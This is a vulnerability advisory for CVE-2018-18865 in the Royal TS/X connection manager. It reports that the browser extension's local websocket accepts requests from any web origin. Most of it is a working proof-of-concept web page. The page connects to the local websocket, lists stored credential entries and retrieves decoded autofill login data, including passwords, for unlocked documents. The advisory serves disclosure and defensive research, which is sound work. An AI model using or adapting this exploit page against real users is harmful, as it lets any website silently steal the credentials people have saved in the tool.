Royal TS/X Information Disclosure

`Title: Royal TS/X - Information Disclosure  
Author: Jakub Palaczynski  
Date: 10. July 2018  
CVE: CVE-2018-18865  
  
Affected product:  
=============  
  
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta  
  
  
Vulnerability - Information Disclosure:  
=============================  
  
Any third party web application can steal credentials created in Royal TS/X  
when browser extension is enabled.  
Browser extension communicates using websockets (default TCP port 54890)  
and websockets do not use any validation to verify origin of the request.  
  
  
PoC website:  
==========  
  
<!DOCTYPE html>  
<meta charset="utf-8" />  
<title>RoyalTS/X Exploit</title>  
<script language="javascript" type="text/javascript">  
  
var wsUri = "ws://127.0.0.1:54890/";  
var output;  
  
function init()  
{  
output = document.getElementById("output");  
testWebSocket();  
}  
  
function testWebSocket()  
{  
writeToScreen("Let's retrieve some data...");  
websocket = new WebSocket(wsUri);  
websocket.onopen = function(evt) {  
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")  
};  
websocket.onclose = function(evt) { onClose(evt) };  
websocket.onmessage = function(evt) { onMessage(evt) };  
websocket.onerror = function(evt) { onError(evt) };  
}  
  
function onOpen(evt,message)  
{  
doSend(message);  
}  
  
function onClose(evt)  
{  
}  
  
function onMessage(evt)  
{  
var obj = JSON.parse(evt.data);  
if (obj['Command'] == "GetDocuments") {  
for (var x in obj['ResponseData']){  
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);  
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);  
for (var y in obj['ResponseData'][x]['Credentials']){  
writeToScreen("Username: " +  
obj['ResponseData'][x]['Credentials'][y]['UserName']);  
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);  
if (obj['ResponseData'][x]['Unlocked'] == true){  
websocket.close();  
websocket = new WebSocket(wsUri);  
websocket.onopen = function(evt) {  
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""  
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +  
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")  
};  
websocket.onclose = function(evt) { onClose(evt) };  
websocket.onmessage = function(evt) { onMessage(evt) };  
websocket.onerror = function(evt) { onError(evt) };  
}  
}  
}  
}  
else {  
if (obj['Command'] == "GetLoginInformation") {  
var obj = JSON.parse(evt.data);  
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));  
}  
}  
}  
  
function onError(evt)  
{  
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);  
}  
  
function doSend(message)  
{  
websocket.send(message);  
}  
  
function writeToScreen(message)  
{  
var pre = document.createElement("p");  
pre.style.wordWrap = "break-word";  
pre.innerHTML = message;  
output.appendChild(pre);  
}  
  
window.addEventListener("load", init, false);  
  
</script>  
  
<h2>RoyalTS/X Exploit</h2>  
  
<div id="output"></div>  
  
  
Contact:  
=======  
  
Jakub[dot]Palaczynski[at]gmail[dot]com  
  
  
`